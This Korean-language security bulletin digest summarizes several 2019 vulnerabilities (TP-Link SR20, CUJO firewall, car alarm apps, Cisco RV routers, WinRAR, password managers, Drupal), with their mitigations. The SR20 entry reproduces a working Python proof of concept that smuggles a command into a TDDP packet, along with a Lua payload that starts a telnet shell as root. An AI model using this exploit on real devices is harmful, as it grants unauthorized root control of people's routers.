해외 보안 트렌드

요약

- TR-Link SR20 스마트 홈 라우터 : 2016년 출시, 인증절차없이 Root 권한 명령 실행 가능

- 취약원인 : TP-장치, 디버그 프로토콜(TP-Device Debug Protocol,TDDP).  일부 type 1 명령어가 ‘노출’되어 있어 공격에 취약

                (root권한으로 TDDP가 실행되는 것과 관련해 많은 취약점이 발견된 바 있음. TDDP는 총 2가지의 명령으로 실       

                행 됨 - type 1: 인증 필요 없음, type 2: 관리자 계정 요구)

- 취약점 : 설정 검증과 관련된 type 1 명령어 0x1f, request 0x01을 이용해 공격자는 파일이름, 세미콜론(;), 인수를

              포함한 명령을 보내 공격 가능.

- 공격방법 : 

        (1) 공격자는 파일이름, 세미콜론(;)을 포함한 명령어를 보내 실행 가능.

 
        (2) 명령을 보낸 공격자 컴퓨터에 다시 연결해, 해당 파일명과 일치하는 파일을 TFTP(Trivial File Transfer Protocol)을       

            통해 다운 받기를 시도함. 

        (3) TDDP의 주요 프로세서는 파일이 나타날 때까지 최대 4초간 대기함. 

        (4) 파일이 나타나면, 초기화된 Lua 인터프리터에 파일을 로드하고, config 파일의 이름과 원격 주소를 config_test( )함수 

             의 인수로 호출함.

        (5) Config_test( )함수는 원격장비에서 다운로드 된 파일에 의해 제공되기 때문에, 비인가 공격자가 root권한으로           

            호스트에서 명령어를 실행하는 os.execute ( )메소드를 포함하는 인터프리터에 임의의 명령어를 실행할 수 있음.         

            TP-Link SR20 장비의 모든 통제가 가능함.

            (TDDP는 root권한으로 실행되기 때문에, 임의 명령어 실행 또한 root권한으로 행해짐.)

- 대응방안 : 현재 공식 패치는 공개되지 않음 

- 영향성 : tddp 데몬은 모든 인커밍 트래픽에 대한 모든 인터페이스를 수신하도록 설계 되어 있으나, SR20과 함께 제공되는     

             기본 방화벽 규칙이 장비가 속한 로컬 네티워크(LAN)이 아닌 외부에서의 공격을 모두 ‘차단’하도록 설정 되어있음.     

             원격 공격 가능성은 희박함.

관련 CVE정보

- 현재 없음
- PoC : https://pastebin.com/GAzccR95
#!/usr/bin/python3

# Create /testfile in your tftp root directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Replace 192.168.0.1 with the IP address of the vulnerable device

import binascii
import socket

port_send = 1040
port_receive = 61000

tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00

tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])

sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))

# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
packet = packet + b"/testfile;arbitrary"
print(packet)
sock_send.sendto(packet, ("192.168.0.1", port_send))
sock_send.close()

response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

참고자료

출처 : http://www.ehackingnews.com/2019/03/tp-links-sr20-smart-home-router.html?utm_source=dlvr.it&utm_medium=twitter
https://www.bleepingcomputer.com/news/security/zero-day-tp-link-sr20-router-vulnerability-disclosed-by-google-dev/

요약

- CUJO Smart 방화벽 : 가정용 네트워크에 사용 되며 Amazon 등에서 구입이 가능 함. 악성코드, 피싱 웹사이트, 해킹 방지 기능을 제공. 

- 취약점 : Cisco Talos 팀은 원격 공격자가 네트워크 트래픽을 모니터링하고, 민감한 정보를 훔칠 수 있는 등, 장비를 전적으로 컨트롤 가능하다며 2가지 취약점을 발표함.

(1) Webroot BrightCloud SDK HTTP 헤더 파싱 코드 실행 취약점 (CVE-2018-4012)

: 비인가 공격자가 BrightCloud 서비스로 가장에 장비에 root 사용자로 임의의 코드를 실행할 수 있음 

(BrightCloud SDK : 웹 브라우징 보호에 사용됨. 기본 설정으로 HTTP 연결을 사용해 공격자가 트래픽을 가로챌 수 있음)

(2) CUJO Smart 방화벽 호스트네임 평판 검증 코드 실행 취약점 (CVE-2018-4031)

: 로컬 네트워크의 비인가 공격자가 HTTP요청의 Host 해더를 특정해 커널에 Lua 스크립트룰 실행할 수 있음 

(Lunatik Lua 엔진 : 웹브라우징 보호 목적으로 네트워크 트래픽을 분석하는데 사용 됨)

Lunatik에서 load()함수 사용이 허용되어 공격자가 커널에서 임의의 코드 실행 가능. 임의의 호스트 네임을 추출해 분석 가능

∴ 위 2 취약점을 이용해 CUJO 네트워크의 클라이언트 장비에 Lun 스크립트 삽입과 커널에 코드 실행을 하도록 하는 JavaScript를 이용해 

   강제로 POST 요청을 수행하도록 할 수 있음.

(3) Das U-Boot 검증 부팅 우회 취약점(CVE-2018-3968)

: 부팅 이미지가 장비에 공급이 가능한 경우, 로컬 또는 원격 접근이 가능한 공격자는 레거시 이미지 형식에 포함된 서명되지 않은 커널을 실행 할 수 있음

(4) CUJO Smart 방화벽 dhcpd.conf 검증 부팅 우회 취약점 (CVE-2018-3969)

: 시스템이 부팅되는 동안 공격자는 임의의 시스템 코드를 실행할 수 있음. 또한 /config/dhcpd.conf파일에 시스템 명령어를 삽입해 시스템이 재부팅될때마다 해당 명령어가 실행되게 할 수 있음

     *Cisco Talos 팀은 위 4개의 취약점을 포함 총 11개의 취약점을 발표

- 대응방안 : 최신 버전으로 업데이트 

관련 CVE정보

- CVE-2018-4012, CVE-2018-4031, CVE-2018-3968, CVE-2018-3969

영향성

- 해당 제품 그룹사는 신속한 패치 필요 

참고자료

Cisco Talos 분석 : https://blog.talosintelligence.com/2019/03/vuln-spotlight-cujo.html

출처 : https://threatpost.com/host-of-flaws-found-in-cujo-smart-firewall/142966/

요약

- 영국 기반 모의해킹/사이버 보안 회사 Pen Test Partner는 Pandora와 Viper 사 제작 차량 알람 시스템이 해킹에 취약하다고 분석 보고서 발표.

- 차량 알람 시스템 : 차량과 스마트키 간의 메시지 전달 방식을 이용한 공격에 대한 예방책으로 사용 되고 있음. 

                           또한 차량 소유주는 앱을 이용해 차량의 위치 검색, 원격 시동 걸기/끄기, 차량 잠금 장치 열기/닫기가 가능함.

- 차량 알람 시스템 안전성 : Pandora사는 자사 시스템이 해킹이 불가능하다며(unhackable) 광고 중

- 취약점 : 모바일 앱 API의 불안전한 직접  사용에 존재하는 직접 객체 참조(direct object reference) 취약점 존재. 

        해당 취약점을 이용해 공격자는 요청값의 파라미터를 조작하는 것만으로도 다른 사용자의 계정에 접근이 가능함

(1) 공통 취약점 : Pandora와 Viper사의 차량 알람 시스템 모두 해킹을 통해 운행  중인 차량 엔진 컨드롤이 가능함 

                     (Viper사의 앱만 테스트에서 엔진 가동 중지에 성공 함)

(2) Pandora앱 : 긴급 구조 요청 전화 시 마이크 접근이 허용되는데, 취약점 공격을 통해 운전자의 대화를 엿들을 수도 있음.

- 공격 재현 : 

(1) 공격자는 모바일 앱 사용자 계정 비밀번호, 이메일 주소를 변경하는 악성 요청값을 보내 비밀번호를 재설정 할 수 있었으며, 

    따라서 계정 권한을 탈취하는데 성공

(2) 계정 권한을 탈취 후에는 다양한 악성 행위가 가능 함

º 차량 정보 획득 : 차량 정보 획득이 가능해 고급 차량만을 대상으로 한 절도 시 활용될 소지 있음

º  실시간 차량 위치 확인 가능

- 공격 시나리오

(1) 공격자는 목표 차량의 실시간 위치를 확인하고 차량을 미행.

(2) 목표 차량이 운행 중일 때, 차량 알람 시스템을 작동하게 해, 운전자가 차량을 정지시키도록 유도.

(3) 해킹한 앱을 이용해 차량 도난방지 시스템을 가동해 차량 운행이 불가하게 만들고, 차량 문을 열고 차량 절도.

- 대응방안 : 현재 두 개의 앱은 패치를 이미 발표함.

*Pen Test Partner는 몇 해전 모바일 앱 해킹을 통해 미쓰비시 아웃랜더 플러그인 하이브리드(PHEV) 차량의 일부 기능을 원격으로 조정할 수 있는 취약점을 발표한 바 있음

(https://www.securityweek.com/researchers-hack-mitsubishi-outlander-phev)

영향성

차량 알람 시스템은 대부분 고가 차량에 사용되고 있어, 취약점 분석 발표는 큰 이슈가 되고 있음

참고자료

Pen Test Partners 취약점 분석 원분 : https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms

출처 : https://www.securityweek.com/flaws-smart-alarms-exposed-millions-cars-dangerous-hacking

요약

- 취약점 : 웹 기반 RV110W 무선-N VPN 방화벽, RV130W 무선-N Multifunction VPN, RV215W 무선-N VPN 라우터 관리 인터페이스에 

             취약점이 존재. 비인가 공격자는 악성 HTTP 요청을 취약 장비에 보내 해당 장치의 운영체제에 높은 사용자 권한으로 원격 코드 실행 가능.

- 취약원인 : 웹 기반 관리 인터페이스에 사용자가 제공하는 데이터에 대한 검증이 미흡하여 발생

- 영향 받는 제품 

º RV110W Wireless-N VPN 방화벽

º RV130W Wireless-N Multifunction VPN 라우터

º RV215W Wireless-N VPN 라우터

*위 장비의 웹 기반 관리 인터페이스는 로컬 LAN연결 또는 원격 관리 기능을 통해 접근 가능. 기본으로 원격 관리 기능은 사용불가로 설정되어 있음

-대응방안 : 최신 버전으로 소프트웨어 업데이트

º RV110W Wireless-N VPN 방화벽 : 1.2.2.1 버전으로 업데이트

º RV130W Wireless-N Multifunction VPN 라우터 : 1.0.3.45 버전으로 업데이트

ºRV215W Wireless-N VPN 라우터 : 1.3.1.1 버전으로 업데이트

관련 CVE정보

- CVE-2019-1663

- CVSS 3.0 Score : 9.8

- PoC : 현재(2019.02.28 11:10) 없음

참고자료

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex

요약

- 신규 WinRAR 압축파일 원격 코드 실행 취약점 공개 5일 후, 해당 취약점 공격을 통해 백도어를 제공하는 악성 메일 배포 포착

- 악성파일 정보

(1) Zip로 압축되어 있으며, 실행 시 “CMSTray.exe”를 Windows 시작폴더에 생성

(2) 멕시코 소재의 IP주소와 연결 되어 있으며, 해당 IP에서 Cobalt Strike Beacon 모의해킹 툴을 다운로드 함.

(3) 현재까지 총 4 종류의 악성 ACE파일이 이메일로 배포되고 있는 것이 확인 됨

- 허위 송장, 배송 문서, 주문서, 은행 서류 

- 대응방안 

(1) ACE 파일 형식 지원이 필요 없을 경우 : 공식 WinRAR 5.70 으로 업데이트 

    (https://www.win-rar.com/start.html?&L=0)

  * 최신 WinRAR 5.70 은 취약 원인인 unacev2.dll 라이브러리와 ACE 지원을 중단.

(2) ACE 파일 형식 지원이 필요한 경우 혹은 업그레이드가 불가능한 경우 : 0patch.com 에서 제공하는 비공식 패치 사용

   (https://blog.0patch.com/2019/02/no-source-code-for-14-year-old.html)

관련 CVE정보

- CVE-2018-20250

- PoC : https://github.com/Ridter/acefile

영향성

취약함 WinRAR 버전 사용 시, 반드시 업그레이드 실시

참고자료

Tenable 취약점 분석: https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0

Check Point 분석 : https://research.checkpoint.com/extracting-code-execution-from-winrar/

WinRAR 공식 패치 : https://www.win-rar.com/start.html?&L=0

0patch.com 마이크로 패치 : https://blog.0patch.com/2019/02/no-source-code-for-14-year-old.html

출처 : https://thehackernews.com/2019/02/winrar-hacking-exploit.html

        https://www.securityweek.com/hackers-exploit-winrar-vulnerability-deliver-malware?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29

요약

- 개인 보안 평가 연구원(Independent Security Evaluators(ISE)들에 따르면 윈도우 기반의 유명 패스워드 매니저 프로그램에 취약점 존재

- 취약한 제품 : Dashlane, LastPass, 1Password, KeePass (해당 제품들을 사용하는 총 사용자 수는 6000만명에 육박, 93,000개의 사업체가 사용 중)

- 보안성 : 

(1) 패스워드 관리 프로그램이 구동 하지 않을 시 : 패스워드들이 안전하게 보호됨

(2) 패스워드 관리 프로그램 구동 중 / 잠금 모드 중 : 키로깅 혹은 클립보드 스니핑을 통해 마스터 패스워드와 다른 패스워드 탈취가 가능

(3) 마스터 패스워드가 유출 될 시 : 공격자는 로그인 정보가 저장된 패스워드 매니저 DB를 쉽게 해독할 수 있음.

(4) LastPass, 1Password, Dashlane 경우 

    PC의 RAM을 목표하거나 다른 일반적인 메모리 포렌식 방법을 사용하여 개인 정보와 평문 마스터 패스워드 획득이 가능함. 

    (선행조건 : spyware 수준의 멀웨어를 PC에 감염 시키고, admin 권한을 탈취)

- 대응 방안 : 

(1) 패스워드 매너지 프로그램을 사용하지 않을 시, 올바르게 프로그램을 종료

(2) 전체 디스크 암호화 실시

영향성

프로그램이 구동/잠금 모드 중 취약점이 발생함으로, 불필요한 경우 반드시 프로그램 종료

참고자료

보고서원문: https://www.securityevaluators.com/casestudies/password-manager-hacking/

출처 : https://www.hackread.com/password-managers-flaws-hackers-steal-clear-text-passwords/

요약

- Drupal : 오픈소스 CMS(Content Management System, 콘텐츠 관리 시스템)로 블로그, 사기업, 공공기관 등 다양한 분야에서 사용되고 있음.

- 취약점 : 일부 필드 형식들이 데이트 검증을 적절하지 않아, 공격자가 임의의 PHP 코드 실행이 가능.

- 영향 받는 경우 : 아래의 조건 중 최소 하나의 조건을 충족 시 취약

(1) Drupal 8 core RESTful 웹 서비스 모듈이 사용가능 하며 PATCH 혹은 POST 요청이 가능한 경우

(2) Drupal 8 core RESTful 웹 서비스 모듈이 사용가능 하며, 해당 사이트가 다른 웹 서비스 모듈 사용 또한 가능한 경우 

    (ex. Drupal 8의 JASON:API, Drupal 7의 서비스 혹은 RESTful 웹 서비스)

- 영향 받는 제품 : Drupal Drupal 8.5.0 - 8.5.10, Drupal Drupal 8.6. 1 - 8.6.9 

- 대응 방안 : 

(1) 버전 업데이트 

1) Drupal 8.6.x -> Drupal 8.6.10

2) Drupal 8.5.x -> Drupal 8.5.11

3) Drupal core 업데이트 후 

4) Drupal 7에 대한 core 업데이트는 불필요하나, 일부 Drupal 7관련 모듈은 업데이트가 필요함

* Drupal 8.5.x 이전 버전의 Drupal 8은 서비스가 종료되어 관련 보안 서비스 제공 없음

(2) 즉각적인 대응

1) 모든 웹 서비스 모듈의 사용 불가능으로 설정

2) 웹 서비스 리소스에 대한 PUT/PATCH/POST 요청이 불가능하다고 웹 서버를 설정.

관련 CVE정보

- CVE-2019-6340

- CVSS 3.0 Score : 9.8

- PoC : 현재(13:40) 없음

참고자료

Drupal : https://www.drupal.org/sa-core-2019-003

출처 : https://www.zdnet.com/article/winrar-versions-released-in-the-last-19-years-impacted-by-severe-security-flaw/#ftag=RSSbaffb68

  https://www.securityfocus.com/bid/106948

요약

- WinRAR : 윈도우 압축 프로그램으로 RAR, ZIP파일 등의 파일형식으로 파일을 포맷, 압축해제 가능. 

               약 5억명의 사용자가 있으며 현재 세계에서 가장 유명한 압축 프로그램으로 알려짐.

- 취약점 : UNACEV2.DLL에 존재하는 디렉토리 경로 조작 취약점으로 인해 악성 압축 파일을 시작 폴더에 압축해제 가능. 

             재부팅을 실시 할 시 공격자는 압축 해제된 파일을 이용해 명령어 실행이 가능함.

- 취약원인 : 모든 WinRAR 버전에 존재하는 UNACEV2.DLL 라이브러리가 어떠한 보안 매커니즘 없이 설계되어 취약점 존재 

                (UNACEV2.DLL : ACE 파일 형식으로 압축을 해제하는데 사용 됨)

- 대응방안 : WinRAR 5.70로 업데이트 

- 일반사용자들은 WinRAR을 업데이트 하기 이전에 이메일에서 의심스러운 ACE 압축파일을 절대 다운로드 하거나 열지 말 것을 당부

관련 CVE정보

- CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253.

- PoC 및 재현 : https://research.checkpoint.com/extracting-code-execution-from-winrar/

탐지룰 존재유무

-Check Point : RARLAB WinRAR ACE Format Input Validation Remote Code Execution (CVE-2018-20250)

참고자료

Check Point 분석 : https://research.checkpoint.com/extracting-code-execution-from-winrar/

WinRAR : https://www.win-rar.com/whatsnew.html?&L=0

출처 : https://www.zdnet.com/article/winrar-versions-released-in-the-last-19-years-impacted-by-severe-security-flaw/#ftag=RSSbaffb68

   https://www.securityfocus.com/bid/106948